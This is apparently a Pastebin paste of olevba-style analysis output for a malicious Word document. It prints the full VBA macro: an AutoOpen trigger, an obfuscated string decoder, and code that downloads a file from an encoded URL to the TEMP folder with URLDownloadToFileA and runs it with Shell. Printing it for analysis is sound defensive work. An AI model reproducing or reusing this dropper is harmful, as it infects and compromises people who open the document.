SHARE
TWEET

Malicious Word macro

dynamoo Feb 26th, 2015 362 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Flags       Filename                                                        
  2. ----------- -----------------------------------------------------------------
  3. OLE:MAS---- igm135809.doc
  4.  
  5. (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  6.  
  7. ===============================================================================
  8. FILE: igm135809.doc
  9. Type: OLE
  10. -------------------------------------------------------------------------------
  11. VBA MACRO ThisDocument.cls
  12. in file: igm135809.doc - OLE stream: u'Macros/VBA/ThisDocument'
  13. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  14. Sub autoopen()
  15. jQ5
  16. End Sub
  17. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  18. ANALYSIS:
  19. +----------+----------+---------------------------------------+
  20. | Type     | Keyword  | Description                           |
  21. +----------+----------+---------------------------------------+
  22. | AutoExec | AutoOpen | Runs when the Word document is opened |
  23. +----------+----------+---------------------------------------+
  24. -------------------------------------------------------------------------------
  25. VBA MACRO Module1.bas
  26. in file: igm135809.doc - OLE stream: u'Macros/VBA/Module1'
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  28.  
  29. Public Function ZBGUQzMmnNQjLfJi(MMzzbkwYsQ As String) As String
  30. GoTo QmoxUCfvciBJyeaaZe
  31. QmoxUCfvciBJyeaaZe:
  32. GoTo OtTFVZcTsVAkgUp
  33. OtTFVZcTsVAkgUp:
  34. GoTo kuddPCeAMbIaLPqebUnk
  35. kuddPCeAMbIaLPqebUnk:
  36. GoTo BHDPSh
  37. BHDPSh:
  38. For NZNKEQTrblrn = 1 To Len(MMzzbkwYsQ) Step 2
  39. GoTo YSwLeyRLBhqqpufYf
  40. YSwLeyRLBhqqpufYf:
  41. GoTo VmpskIYQAjlFinAKgthS
  42. VmpskIYQAjlFinAKgthS:
  43. GoTo PrZqcgGgsmEBYtRKGR
  44. PrZqcgGgsmEBYtRKGR:
  45. GoTo TGQojMOuOUcR
  46. TGQojMOuOUcR:
  47. GoTo HFKiovanmCFIAao
  48. HFKiovanmCFIAao:
  49. ZBGUQzMmnNQjLfJi = ZBGUQzMmnNQjLfJi & Mid(MMzzbkwYsQ, NZNKEQTrblrn, 1)
  50. GoTo BVyDQNwJjjKS
  51. BVyDQNwJjjKS:
  52. GoTo cGfwQxICUDbKUbQ
  53. cGfwQxICUDbKUbQ:
  54. GoTo OVYhEzdfLRlti
  55. OVYhEzdfLRlti:
  56. GoTo JIMyELdDCSILDcFk
  57. JIMyELdDCSILDcFk:
  58. GoTo EZOFTeMMzzbkwYsQvN
  59. EZOFTeMMzzbkwYsQvN:
  60. GoTo KEQTrblrnzPQmoxUC
  61. KEQTrblrnzPQmoxUC:
  62. Next
  63. GoTo iBJye
  64. iBJye:
  65. GoTo ZeOHO
  66. ZeOHO:
  67. GoTo FVZcTsVAkgUpgVkuddP
  68. FVZcTsVAkgUpgVkuddP:
  69. End Function
  70.  
  71. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  72. ANALYSIS:
  73. No suspicious keyword or IOC found.
  74. -------------------------------------------------------------------------------
  75. VBA MACRO Class1.cls
  76. in file: igm135809.doc - OLE stream: u'Macros/VBA/Class1'
  77. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  78. (empty macro)
  79. -------------------------------------------------------------------------------
  80. VBA MACRO dfsdfsdf.bas
  81. in file: igm135809.doc - OLE stream: u'Macros/VBA/dfsdfsdf'
  82. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  83. #If VBA7 Then
  84.     Private Declare PtrSafe Function GHJbkjJKG Lib "urlmon" Alias _
  85.     "URLDownloadToFileA" (ByVal fdgsdfFF As LongPtr, _
  86.     ByVal gfhgfhF As String, _
  87.     ByVal hjkhgFF As String, _
  88.     ByVal gfhfghF As Long, _
  89.     ByVal gfdgdf As LongPtr) As LongPtr
  90. #Else
  91.     Private Declare Function GHJbkjJKG Lib "urlmon" Alias _
  92.     "URLDownloadToFileA" (ByVal fdgsdfFF As Long, _
  93.     ByVal gfhgfhF As String, _
  94.     ByVal hjkhgFF As String, _
  95.     ByVal gfhfghF As Long, _
  96.     ByVal gfdgdf As Long) As Long
  97. #End If
  98. Public Function ZXVDwjtQQrzvB71() As Integer
  99. Dim wFLdECQJIjCco17, aclHuKhrZdvFz71, ZGHsTHAroMpPX33, fjJHrRdaoktmZ65 As String
  100. Dim fcBkLtHUPAViT23, mWaFlcfvpbGqs65, xjTEqCqYYumMA98, jHsPLZznaTPjl82 As Integer
  101. fcBkLtHUPAViT23 = 6394
  102. wFLdECQJIjCco17 = R
  103. mWaFlcfvpbGqs65 = Asc(wFLdECQJIjCco17)
  104. If fcBkLtHUPAViT23 > mWaFlcfvpbGqs65 Then
  105.     For xjTEqCqYYumMA98 = 1 To 54
  106.        jHsPLZznaTPjl82 = mWaFlcfvpbGqs65 + xjTEqCqYYumMA98
  107.     Next xjTEqCqYYumMA98
  108. jHsPLZznaTPjl82 = jHsPLZznaTPjl82 + fcBkLtHUPAViT23
  109. aclHuKhrZdvFz71 = CStr(jHsPLZznaTPjl82)
  110. ZGHsTHAroMpPX33 = Mid$(aclHuKhrZdvFz71, 1, 4)
  111. fjJHrRdaoktmZ65 = fjJHrRdaoktmZ65 & "25"
  112. ZXVDwjtQQrzvB71 = CInt(Mid$(fjJHrRdaoktmZ65, 2, 6))
  113. Else
  114. ZXVDwjtQQrzvB71 = 54 + 6394
  115. MsgBox ("dvuZGYOgDjMWl95")
  116. End Function
  117.  
  118.  
  119. Sub jQ5()
  120. mog4O4d49 ZBGUQzMmnNQjLfJi("hot}t€p.:\/R/'x*oimum6aF.1nneetf/cjlsP/]bki&nZ.Xewxdei"), Environ(ZBGUQzMmnNQjLfJi("T)M\P[")) & ZBGUQzMmnNQjLfJi("\zGfVlh\j(J_J7V3JtH^.…esxae|")
  121. End Sub
  122. Function mog4O4d49(Mh9_094suu As String, R4_t As String) As Boolean
  123. vJHKBJdfkgfg = GHJbkjJKG(0&, Mh9_094suu, R4_t, 0&, 0&)
  124. Dim j_W8
  125. j_W8 = Shell(R4_t, 1)
  126. End Function
  127.  
  128.  
  129.  
  130. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  131. ANALYSIS:
  132. +------------+--------------------+-----------------------------------------+
  133. | Type       | Keyword            | Description                             |
  134. +------------+--------------------+-----------------------------------------+
  135. | Suspicious | Lib                | May run code from a DLL                 |
  136. | Suspicious | Shell              | May run an executable file or a system  |
  137. |            |                    | command                                 |
  138. | Suspicious | Environ            | May read system environment variables   |
  139. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  140. +------------+--------------------+-----------------------------------------+
  141. -------------------------------------------------------------------------------
  142. VBA MACRO Module2.bas
  143. in file: igm135809.doc - OLE stream: u'Macros/VBA/Module2'
  144. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  145. (empty macro)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top